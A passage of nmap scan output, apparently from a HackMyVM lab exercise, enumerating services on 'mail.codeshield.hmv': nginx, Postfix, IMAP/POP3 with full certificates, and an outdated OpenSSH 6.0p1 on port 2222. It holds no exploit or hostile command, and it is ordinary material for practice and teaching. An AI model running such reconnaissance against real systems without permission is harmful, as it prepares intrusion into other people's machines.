Xy4PckJUDFLD62DEYzPgDMXhLZCaAFbeUgMsmpY+HMPgmptp7UKC94sNw5Hvfq0U\n| dtBjSs33uZ+brNaqI+Y7QxWrl33exEhrjrUJ4UvCG8R\/+rlXrRJYWHKisujn+BCj\n| ZIVO9ZpeeecuAXKHgHKZLmF7hpJnQdDt5oTkqG4PmiNauG8bxF+eeZKn27wck5nR\n| oslJyh\/ZCYCjgUKG1FoqSYPd5LXBNLqld38DdoiQpCoqezQXtabdHOY1Syqprope\n| iVfG8NlOKXtTDcBOLkOVD\/DuiMQvsX8Zbg7FdkQ5cDubqO1cHd47kK0wiNrLVeEK\n| yxSEqTqsXnYPHTJkxkvbjJZB2ZBQXVnQkQM4Avm6OSD0K7Vglc\/15wYXlYarGgMH\n| sMDzpOY+uhmsu6CKsLufZaG4N8\/vbQWw73yqDpZgwqBi6ZPnw3JLJ5PnyHPtojTS\n| 1ZUy\n|_-----END CERTIFICATE-----\n443\/tcp open ssl\/http syn-ack nginx\n| ssl-cert: Subject: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Issuer: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Public Key type: rsa\n| Public Key bits: 4096\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2023-08-26T09:34:43\n| Not valid after: 2033-08-23T09:34:43\n| MD5: 04aa:3069:8114:4330:b40e:52bc:e802:f76c\n| SHA-1: a8d3:37d7:c10b:ea04:a17a:6199:fd81:ec6a:c56c:bd88\n| -----BEGIN CERTIFICATE-----\n| MIIGLzCCBBegAwIBAgIUe8PK2tPWbQYNvUv9OQ8b9fmcWJwwDQYJKoZIhvcNAQEL\n| BQAwgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0RvbmcxETAPBgNVBAcM\n| CFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12MQswCQYDVQQL\n| DAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUGCSqGSIb3DQEJ\n| ARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MB4XDTIzMDgyNjA5MzQ0M1oXDTMz\n| MDgyMzA5MzQ0M1owgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0Rvbmcx\n| ETAPBgNVBAcMCFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12\n| MQswCQYDVQQLDAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUG\n| CSqGSIb3DQEJARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MIICIjANBgkqhkiG\n| 9w0BAQEFAAOCAg8AMIICCgKCAgEAjElMTDo4Oe5q6AKX108lxiHdVqX4PLV50LFG\n| BogBdeU8K1DL6Leu5iMRJTl5JV83yjSUJ4qg+1O6VOjW49mqYc+mJDjTvKtHEn+v\n| H4SaOOj7fEmj0iFyKbrBr79S9icKOUk5maMvsjFmN2o2SIYsIV0TphbN+emeotCI\n| 9G21uKbaLLVI\/qOQosZLx+cZu1EZXsWCctFta67qzqAymbvx0BMB9zctIZy0bpmc\n| +WD4LPEqjSe09G9LnKthrcl94EMR+ITQKgcFVWfnXxrcs1TGSGdLeRbs1nRXzS2c\n| mQCns4N\/OnUTzURURsDoVzvedM+iBjSjK7fQpK71ME8hbqO0o+Vs1OYvo9Gc5jIJ\n| xkbQDIEmSmaeoMD\/Z6KownJP78C5+rlAyx+poMg0sDQDeAiNf9JjpDPDKbWaD3be\n| AZeBkJnCFIDYDQqiBdrtdS8alWp+tyDmLPs+0QvVinhv8QvkQO0zBqu6436lAO\/5\n| mTULHnvcduY4zQxh6HRx3xBjLX0y3dnVynLrSh+HzrWGpT8GId3ya+NzvidVNz7r\n| 08WF\/gFFt8n9RDdsvfkT7JlMeiyNc2AXcM+raoP92S\/+mCYuFfg5lx3ECV1piiW7\n| MFy8ZJsvllFfHFoQN1DxroqBiQqKCDwJ2TJfpa6n900fiD70fjEU+1EZKtFRbngj\n| snYppJMCAwEAAaNTMFEwHQYDVR0OBBYEFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMB8G\n| A1UdIwQYMBaAFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMA8GA1UdEwEB\/wQFMAMBAf8w\n| DQYJKoZIhvcNAQELBQADggIBAFkTH5QVtaciZ6+4PaABU4DXEzlue0UuABpByYTM\n| 3TRrK4MtlnnchHwofu6qK7E2qIAM\/E\/yheSh9N\/DKke8U3nAPYlcMVEtnygjS7fa\n| KLGvj2LNhNj+z8EjNZDA\/iQaz254EWrKw9hO6Tt\/\/c3qEiI6PrnvK3Soj9btcSne\n| oiXvnRvb49V4MBD\/1gjHg1nIhjlgxcjVBXSbl\/z2xBYHS58fwttmHkRIBxErVJdN\n| Xy4PckJUDFLD62DEYzPgDMXhLZCaAFbeUgMsmpY+HMPgmptp7UKC94sNw5Hvfq0U\n| dtBjSs33uZ+brNaqI+Y7QxWrl33exEhrjrUJ4UvCG8R\/+rlXrRJYWHKisujn+BCj\n| ZIVO9ZpeeecuAXKHgHKZLmF7hpJnQdDt5oTkqG4PmiNauG8bxF+eeZKn27wck5nR\n| oslJyh\/ZCYCjgUKG1FoqSYPd5LXBNLqld38DdoiQpCoqezQXtabdHOY1Syqprope\n| iVfG8NlOKXtTDcBOLkOVD\/DuiMQvsX8Zbg7FdkQ5cDubqO1cHd47kK0wiNrLVeEK\n| yxSEqTqsXnYPHTJkxkvbjJZB2ZBQXVnQkQM4Avm6OSD0K7Vglc\/15wYXlYarGgMH\n| sMDzpOY+uhmsu6CKsLufZaG4N8\/vbQWw73yqDpZgwqBi6ZPnw3JLJ5PnyHPtojTS\n| 1ZUy\n|_-----END CERTIFICATE-----\n|_http-title: CodeShield - Home\n|_http-favicon: Unknown favicon MD5: 6BA827A71F6ECC3A5A21495F05755824\n|_ssl-date: TLS randomness does not represent time\n| http-methods: \n|_ Supported Methods: GET HEAD\n| http-robots.txt: 1 disallowed entry \n|_\/\n465\/tcp open ssl\/smtp syn-ack Postfix smtpd\n| ssl-cert: Subject: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Issuer: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Public Key type: rsa\n| Public Key bits: 4096\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2023-08-26T09:34:43\n| Not valid after: 2033-08-23T09:34:43\n| MD5: 04aa:3069:8114:4330:b40e:52bc:e802:f76c\n| SHA-1: a8d3:37d7:c10b:ea04:a17a:6199:fd81:ec6a:c56c:bd88\n| -----BEGIN CERTIFICATE-----\n| MIIGLzCCBBegAwIBAgIUe8PK2tPWbQYNvUv9OQ8b9fmcWJwwDQYJKoZIhvcNAQEL\n| BQAwgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0RvbmcxETAPBgNVBAcM\n| CFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12MQswCQYDVQQL\n| DAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUGCSqGSIb3DQEJ\n| ARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MB4XDTIzMDgyNjA5MzQ0M1oXDTMz\n| MDgyMzA5MzQ0M1owgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0Rvbmcx\n| ETAPBgNVBAcMCFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12\n| MQswCQYDVQQLDAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUG\n| CSqGSIb3DQEJARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MIICIjANBgkqhkiG\n| 9w0BAQEFAAOCAg8AMIICCgKCAgEAjElMTDo4Oe5q6AKX108lxiHdVqX4PLV50LFG\n| BogBdeU8K1DL6Leu5iMRJTl5JV83yjSUJ4qg+1O6VOjW49mqYc+mJDjTvKtHEn+v\n| H4SaOOj7fEmj0iFyKbrBr79S9icKOUk5maMvsjFmN2o2SIYsIV0TphbN+emeotCI\n| 9G21uKbaLLVI\/qOQosZLx+cZu1EZXsWCctFta67qzqAymbvx0BMB9zctIZy0bpmc\n| +WD4LPEqjSe09G9LnKthrcl94EMR+ITQKgcFVWfnXxrcs1TGSGdLeRbs1nRXzS2c\n| mQCns4N\/OnUTzURURsDoVzvedM+iBjSjK7fQpK71ME8hbqO0o+Vs1OYvo9Gc5jIJ\n| xkbQDIEmSmaeoMD\/Z6KownJP78C5+rlAyx+poMg0sDQDeAiNf9JjpDPDKbWaD3be\n| AZeBkJnCFIDYDQqiBdrtdS8alWp+tyDmLPs+0QvVinhv8QvkQO0zBqu6436lAO\/5\n| mTULHnvcduY4zQxh6HRx3xBjLX0y3dnVynLrSh+HzrWGpT8GId3ya+NzvidVNz7r\n| 08WF\/gFFt8n9RDdsvfkT7JlMeiyNc2AXcM+raoP92S\/+mCYuFfg5lx3ECV1piiW7\n| MFy8ZJsvllFfHFoQN1DxroqBiQqKCDwJ2TJfpa6n900fiD70fjEU+1EZKtFRbngj\n| snYppJMCAwEAAaNTMFEwHQYDVR0OBBYEFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMB8G\n| A1UdIwQYMBaAFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMA8GA1UdEwEB\/wQFMAMBAf8w\n| DQYJKoZIhvcNAQELBQADggIBAFkTH5QVtaciZ6+4PaABU4DXEzlue0UuABpByYTM\n| 3TRrK4MtlnnchHwofu6qK7E2qIAM\/E\/yheSh9N\/DKke8U3nAPYlcMVEtnygjS7fa\n| KLGvj2LNhNj+z8EjNZDA\/iQaz254EWrKw9hO6Tt\/\/c3qEiI6PrnvK3Soj9btcSne\n| oiXvnRvb49V4MBD\/1gjHg1nIhjlgxcjVBXSbl\/z2xBYHS58fwttmHkRIBxErVJdN\n| Xy4PckJUDFLD62DEYzPgDMXhLZCaAFbeUgMsmpY+HMPgmptp7UKC94sNw5Hvfq0U\n| dtBjSs33uZ+brNaqI+Y7QxWrl33exEhrjrUJ4UvCG8R\/+rlXrRJYWHKisujn+BCj\n| ZIVO9ZpeeecuAXKHgHKZLmF7hpJnQdDt5oTkqG4PmiNauG8bxF+eeZKn27wck5nR\n| oslJyh\/ZCYCjgUKG1FoqSYPd5LXBNLqld38DdoiQpCoqezQXtabdHOY1Syqprope\n| iVfG8NlOKXtTDcBOLkOVD\/DuiMQvsX8Zbg7FdkQ5cDubqO1cHd47kK0wiNrLVeEK\n| yxSEqTqsXnYPHTJkxkvbjJZB2ZBQXVnQkQM4Avm6OSD0K7Vglc\/15wYXlYarGgMH\n| sMDzpOY+uhmsu6CKsLufZaG4N8\/vbQWw73yqDpZgwqBi6ZPnw3JLJ5PnyHPtojTS\n| 1ZUy\n|_-----END CERTIFICATE-----\n|_smtp-commands: mail.codeshield.hmv, PIPELINING, SIZE 15728640, ETRN, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING\n|_ssl-date: TLS randomness does not represent time\n587\/tcp open smtp syn-ack Postfix smtpd\n| ssl-cert: Subject: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Issuer: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Public Key type: rsa\n| Public Key bits: 4096\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2023-08-26T09:34:43\n| Not valid after: 2033-08-23T09:34:43\n| MD5: 04aa:3069:8114:4330:b40e:52bc:e802:f76c\n| SHA-1: a8d3:37d7:c10b:ea04:a17a:6199:fd81:ec6a:c56c:bd88\n| -----BEGIN CERTIFICATE-----\n| MIIGLzCCBBegAwIBAgIUe8PK2tPWbQYNvUv9OQ8b9fmcWJwwDQYJKoZIhvcNAQEL\n| BQAwgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0RvbmcxETAPBgNVBAcM\n| CFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12MQswCQYDVQQL\n| DAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUGCSqGSIb3DQEJ\n| ARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MB4XDTIzMDgyNjA5MzQ0M1oXDTMz\n| MDgyMzA5MzQ0M1owgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0Rvbmcx\n| ETAPBgNVBAcMCFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12\n| MQswCQYDVQQLDAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUG\n| CSqGSIb3DQEJARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MIICIjANBgkqhkiG\n| 9w0BAQEFAAOCAg8AMIICCgKCAgEAjElMTDo4Oe5q6AKX108lxiHdVqX4PLV50LFG\n| BogBdeU8K1DL6Leu5iMRJTl5JV83yjSUJ4qg+1O6VOjW49mqYc+mJDjTvKtHEn+v\n| H4SaOOj7fEmj0iFyKbrBr79S9icKOUk5maMvsjFmN2o2SIYsIV0TphbN+emeotCI\n| 9G21uKbaLLVI\/qOQosZLx+cZu1EZXsWCctFta67qzqAymbvx0BMB9zctIZy0bpmc\n| +WD4LPEqjSe09G9LnKthrcl94EMR+ITQKgcFVWfnXxrcs1TGSGdLeRbs1nRXzS2c\n| mQCns4N\/OnUTzURURsDoVzvedM+iBjSjK7fQpK71ME8hbqO0o+Vs1OYvo9Gc5jIJ\n| xkbQDIEmSmaeoMD\/Z6KownJP78C5+rlAyx+poMg0sDQDeAiNf9JjpDPDKbWaD3be\n| AZeBkJnCFIDYDQqiBdrtdS8alWp+tyDmLPs+0QvVinhv8QvkQO0zBqu6436lAO\/5\n| mTULHnvcduY4zQxh6HRx3xBjLX0y3dnVynLrSh+HzrWGpT8GId3ya+NzvidVNz7r\n| 08WF\/gFFt8n9RDdsvfkT7JlMeiyNc2AXcM+raoP92S\/+mCYuFfg5lx3ECV1piiW7\n| MFy8ZJsvllFfHFoQN1DxroqBiQqKCDwJ2TJfpa6n900fiD70fjEU+1EZKtFRbngj\n| snYppJMCAwEAAaNTMFEwHQYDVR0OBBYEFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMB8G\n| A1UdIwQYMBaAFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMA8GA1UdEwEB\/wQFMAMBAf8w\n| DQYJKoZIhvcNAQELBQADggIBAFkTH5QVtaciZ6+4PaABU4DXEzlue0UuABpByYTM\n| 3TRrK4MtlnnchHwofu6qK7E2qIAM\/E\/yheSh9N\/DKke8U3nAPYlcMVEtnygjS7fa\n| KLGvj2LNhNj+z8EjNZDA\/iQaz254EWrKw9hO6Tt\/\/c3qEiI6PrnvK3Soj9btcSne\n| oiXvnRvb49V4MBD\/1gjHg1nIhjlgxcjVBXSbl\/z2xBYHS58fwttmHkRIBxErVJdN\n| Xy4PckJUDFLD62DEYzPgDMXhLZCaAFbeUgMsmpY+HMPgmptp7UKC94sNw5Hvfq0U\n| dtBjSs33uZ+brNaqI+Y7QxWrl33exEhrjrUJ4UvCG8R\/+rlXrRJYWHKisujn+BCj\n| ZIVO9ZpeeecuAXKHgHKZLmF7hpJnQdDt5oTkqG4PmiNauG8bxF+eeZKn27wck5nR\n| oslJyh\/ZCYCjgUKG1FoqSYPd5LXBNLqld38DdoiQpCoqezQXtabdHOY1Syqprope\n| iVfG8NlOKXtTDcBOLkOVD\/DuiMQvsX8Zbg7FdkQ5cDubqO1cHd47kK0wiNrLVeEK\n| yxSEqTqsXnYPHTJkxkvbjJZB2ZBQXVnQkQM4Avm6OSD0K7Vglc\/15wYXlYarGgMH\n| sMDzpOY+uhmsu6CKsLufZaG4N8\/vbQWw73yqDpZgwqBi6ZPnw3JLJ5PnyHPtojTS\n| 1ZUy\n|_-----END CERTIFICATE-----\n|_smtp-commands: mail.codeshield.hmv, PIPELINING, SIZE 15728640, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING\n|_ssl-date: TLS randomness does not represent time\n993\/tcp open imaps? syn-ack\n| ssl-cert: Subject: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Issuer: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Public Key type: rsa\n| Public Key bits: 4096\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2023-08-26T09:34:43\n| Not valid after: 2033-08-23T09:34:43\n| MD5: 04aa:3069:8114:4330:b40e:52bc:e802:f76c\n| SHA-1: a8d3:37d7:c10b:ea04:a17a:6199:fd81:ec6a:c56c:bd88\n| -----BEGIN CERTIFICATE-----\n| MIIGLzCCBBegAwIBAgIUe8PK2tPWbQYNvUv9OQ8b9fmcWJwwDQYJKoZIhvcNAQEL\n| BQAwgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0RvbmcxETAPBgNVBAcM\n| CFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12MQswCQYDVQQL\n| DAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUGCSqGSIb3DQEJ\n| ARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MB4XDTIzMDgyNjA5MzQ0M1oXDTMz\n| MDgyMzA5MzQ0M1owgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0Rvbmcx\n| ETAPBgNVBAcMCFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12\n| MQswCQYDVQQLDAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUG\n| CSqGSIb3DQEJARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MIICIjANBgkqhkiG\n| 9w0BAQEFAAOCAg8AMIICCgKCAgEAjElMTDo4Oe5q6AKX108lxiHdVqX4PLV50LFG\n| BogBdeU8K1DL6Leu5iMRJTl5JV83yjSUJ4qg+1O6VOjW49mqYc+mJDjTvKtHEn+v\n| H4SaOOj7fEmj0iFyKbrBr79S9icKOUk5maMvsjFmN2o2SIYsIV0TphbN+emeotCI\n| 9G21uKbaLLVI\/qOQosZLx+cZu1EZXsWCctFta67qzqAymbvx0BMB9zctIZy0bpmc\n| +WD4LPEqjSe09G9LnKthrcl94EMR+ITQKgcFVWfnXxrcs1TGSGdLeRbs1nRXzS2c\n| mQCns4N\/OnUTzURURsDoVzvedM+iBjSjK7fQpK71ME8hbqO0o+Vs1OYvo9Gc5jIJ\n| xkbQDIEmSmaeoMD\/Z6KownJP78C5+rlAyx+poMg0sDQDeAiNf9JjpDPDKbWaD3be\n| AZeBkJnCFIDYDQqiBdrtdS8alWp+tyDmLPs+0QvVinhv8QvkQO0zBqu6436lAO\/5\n| mTULHnvcduY4zQxh6HRx3xBjLX0y3dnVynLrSh+HzrWGpT8GId3ya+NzvidVNz7r\n| 08WF\/gFFt8n9RDdsvfkT7JlMeiyNc2AXcM+raoP92S\/+mCYuFfg5lx3ECV1piiW7\n| MFy8ZJsvllFfHFoQN1DxroqBiQqKCDwJ2TJfpa6n900fiD70fjEU+1EZKtFRbngj\n| snYppJMCAwEAAaNTMFEwHQYDVR0OBBYEFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMB8G\n| A1UdIwQYMBaAFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMA8GA1UdEwEB\/wQFMAMBAf8w\n| DQYJKoZIhvcNAQELBQADggIBAFkTH5QVtaciZ6+4PaABU4DXEzlue0UuABpByYTM\n| 3TRrK4MtlnnchHwofu6qK7E2qIAM\/E\/yheSh9N\/DKke8U3nAPYlcMVEtnygjS7fa\n| KLGvj2LNhNj+z8EjNZDA\/iQaz254EWrKw9hO6Tt\/\/c3qEiI6PrnvK3Soj9btcSne\n| oiXvnRvb49V4MBD\/1gjHg1nIhjlgxcjVBXSbl\/z2xBYHS58fwttmHkRIBxErVJdN\n| Xy4PckJUDFLD62DEYzPgDMXhLZCaAFbeUgMsmpY+HMPgmptp7UKC94sNw5Hvfq0U\n| dtBjSs33uZ+brNaqI+Y7QxWrl33exEhrjrUJ4UvCG8R\/+rlXrRJYWHKisujn+BCj\n| ZIVO9ZpeeecuAXKHgHKZLmF7hpJnQdDt5oTkqG4PmiNauG8bxF+eeZKn27wck5nR\n| oslJyh\/ZCYCjgUKG1FoqSYPd5LXBNLqld38DdoiQpCoqezQXtabdHOY1Syqprope\n| iVfG8NlOKXtTDcBOLkOVD\/DuiMQvsX8Zbg7FdkQ5cDubqO1cHd47kK0wiNrLVeEK\n| yxSEqTqsXnYPHTJkxkvbjJZB2ZBQXVnQkQM4Avm6OSD0K7Vglc\/15wYXlYarGgMH\n| sMDzpOY+uhmsu6CKsLufZaG4N8\/vbQWw73yqDpZgwqBi6ZPnw3JLJ5PnyHPtojTS\n| 1ZUy\n|_-----END CERTIFICATE-----\n|_imap-capabilities: IDLE SASL-IR more have ID post-login listed AUTH=PLAIN ENABLE capabilities IMAP4rev1 Pre-login OK AUTH=LOGINA0001 LITERAL+ LOGIN-REFERRALS\n|_ssl-date: TLS randomness does not represent time\n995\/tcp open pop3s? syn-ack\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Issuer: commonName=mail.codeshield.hmv\/organizationName=mail.codeshield.hmv\/stateOrProvinceName=GuangDong\/countryName=CN\/localityName=ShenZhen\/emailAddress=root@mail.codeshield.hmv\/organizationalUnitName=IT\n| Public Key type: rsa\n| Public Key bits: 4096\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2023-08-26T09:34:43\n| Not valid after: 2033-08-23T09:34:43\n| MD5: 04aa:3069:8114:4330:b40e:52bc:e802:f76c\n| SHA-1: a8d3:37d7:c10b:ea04:a17a:6199:fd81:ec6a:c56c:bd88\n| -----BEGIN CERTIFICATE-----\n| MIIGLzCCBBegAwIBAgIUe8PK2tPWbQYNvUv9OQ8b9fmcWJwwDQYJKoZIhvcNAQEL\n| BQAwgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0RvbmcxETAPBgNVBAcM\n| CFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12MQswCQYDVQQL\n| DAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUGCSqGSIb3DQEJ\n| ARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MB4XDTIzMDgyNjA5MzQ0M1oXDTMz\n| MDgyMzA5MzQ0M1owgaYxCzAJBgNVBAYTAkNOMRIwEAYDVQQIDAlHdWFuZ0Rvbmcx\n| ETAPBgNVBAcMCFNoZW5aaGVuMRwwGgYDVQQKDBNtYWlsLmNvZGVzaGllbGQuaG12\n| MQswCQYDVQQLDAJJVDEcMBoGA1UEAwwTbWFpbC5jb2Rlc2hpZWxkLmhtdjEnMCUG\n| CSqGSIb3DQEJARYYcm9vdEBtYWlsLmNvZGVzaGllbGQuaG12MIICIjANBgkqhkiG\n| 9w0BAQEFAAOCAg8AMIICCgKCAgEAjElMTDo4Oe5q6AKX108lxiHdVqX4PLV50LFG\n| BogBdeU8K1DL6Leu5iMRJTl5JV83yjSUJ4qg+1O6VOjW49mqYc+mJDjTvKtHEn+v\n| H4SaOOj7fEmj0iFyKbrBr79S9icKOUk5maMvsjFmN2o2SIYsIV0TphbN+emeotCI\n| 9G21uKbaLLVI\/qOQosZLx+cZu1EZXsWCctFta67qzqAymbvx0BMB9zctIZy0bpmc\n| +WD4LPEqjSe09G9LnKthrcl94EMR+ITQKgcFVWfnXxrcs1TGSGdLeRbs1nRXzS2c\n| mQCns4N\/OnUTzURURsDoVzvedM+iBjSjK7fQpK71ME8hbqO0o+Vs1OYvo9Gc5jIJ\n| xkbQDIEmSmaeoMD\/Z6KownJP78C5+rlAyx+poMg0sDQDeAiNf9JjpDPDKbWaD3be\n| AZeBkJnCFIDYDQqiBdrtdS8alWp+tyDmLPs+0QvVinhv8QvkQO0zBqu6436lAO\/5\n| mTULHnvcduY4zQxh6HRx3xBjLX0y3dnVynLrSh+HzrWGpT8GId3ya+NzvidVNz7r\n| 08WF\/gFFt8n9RDdsvfkT7JlMeiyNc2AXcM+raoP92S\/+mCYuFfg5lx3ECV1piiW7\n| MFy8ZJsvllFfHFoQN1DxroqBiQqKCDwJ2TJfpa6n900fiD70fjEU+1EZKtFRbngj\n| snYppJMCAwEAAaNTMFEwHQYDVR0OBBYEFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMB8G\n| A1UdIwQYMBaAFCv1rp3\/MwRFVlV1yx2+j4A\/1TPZMA8GA1UdEwEB\/wQFMAMBAf8w\n| DQYJKoZIhvcNAQELBQADggIBAFkTH5QVtaciZ6+4PaABU4DXEzlue0UuABpByYTM\n| 3TRrK4MtlnnchHwofu6qK7E2qIAM\/E\/yheSh9N\/DKke8U3nAPYlcMVEtnygjS7fa\n| KLGvj2LNhNj+z8EjNZDA\/iQaz254EWrKw9hO6Tt\/\/c3qEiI6PrnvK3Soj9btcSne\n| oiXvnRvb49V4MBD\/1gjHg1nIhjlgxcjVBXSbl\/z2xBYHS58fwttmHkRIBxErVJdN\n| Xy4PckJUDFLD62DEYzPgDMXhLZCaAFbeUgMsmpY+HMPgmptp7UKC94sNw5Hvfq0U\n| dtBjSs33uZ+brNaqI+Y7QxWrl33exEhrjrUJ4UvCG8R\/+rlXrRJYWHKisujn+BCj\n| ZIVO9ZpeeecuAXKHgHKZLmF7hpJnQdDt5oTkqG4PmiNauG8bxF+eeZKn27wck5nR\n| oslJyh\/ZCYCjgUKG1FoqSYPd5LXBNLqld38DdoiQpCoqezQXtabdHOY1Syqprope\n| iVfG8NlOKXtTDcBOLkOVD\/DuiMQvsX8Zbg7FdkQ5cDubqO1cHd47kK0wiNrLVeEK\n| yxSEqTqsXnYPHTJkxkvbjJZB2ZBQXVnQkQM4Avm6OSD0K7Vglc\/15wYXlYarGgMH\n| sMDzpOY+uhmsu6CKsLufZaG4N8\/vbQWw73yqDpZgwqBi6ZPnw3JLJ5PnyHPtojTS\n| 1ZUy\n|_-----END CERTIFICATE-----\n|_pop3-capabilities: TOP UIDL SASL(PLAIN LOGIN) USER RESP-CODES CAPA AUTH-RESP-CODE PIPELINING\n2222\/tcp open ssh syn-ack OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 32:14:67:32:02:7a:b6:e4:7f:a7:22:0b:02:fd:ee:07 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuHgUlIwWnDaiir2GGz0SZ364+nUeN06MhKR1Ahpj0qttOmTUXB45W9LOLALPxvRIWFsE7b04T5MK4kCvM4VwKai+n6ON4kEkAqImw8UDpviFSLn5+A19IkBkiDPUtm2G\/DD+NTXj2w1TD2Pr1Wi6zY6tN3klkf6bkcszQ863BrGe5WHQhnNotc8+O5U8Fl01Fu46Pd6arpCpvaXgBL7h9eOcIHaTqComgbeDcrqmSiGM1RRzhh\/er1WtfClT0bFjSCaDe5NpE0Oat92xzFuQ62c3Z5hqDfYLh6mkFGH062Lc4xkGS84q2GByWzvKgxXtAGDURdxGkpo0H9FAmuaKb\n| 256 34:e4:d0:5d:bd:bc:9e:3f:4c:f9:1e:7d:3c:60:ce:6e (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKw9aldAVwBR4fxzLD1Dqr4iBFV11fNBaZ+8pX4f1HDbPEscd2BkHMsYxR17e0zpSttM6DSfKT+YbLu2lDHWHmg=\n| 256 ef:3c:ff:f9:9a:a3:aa:7d:5a:82:73:b9:8c:b8:97:04 (ED25519)\n|_ssh-ed25519 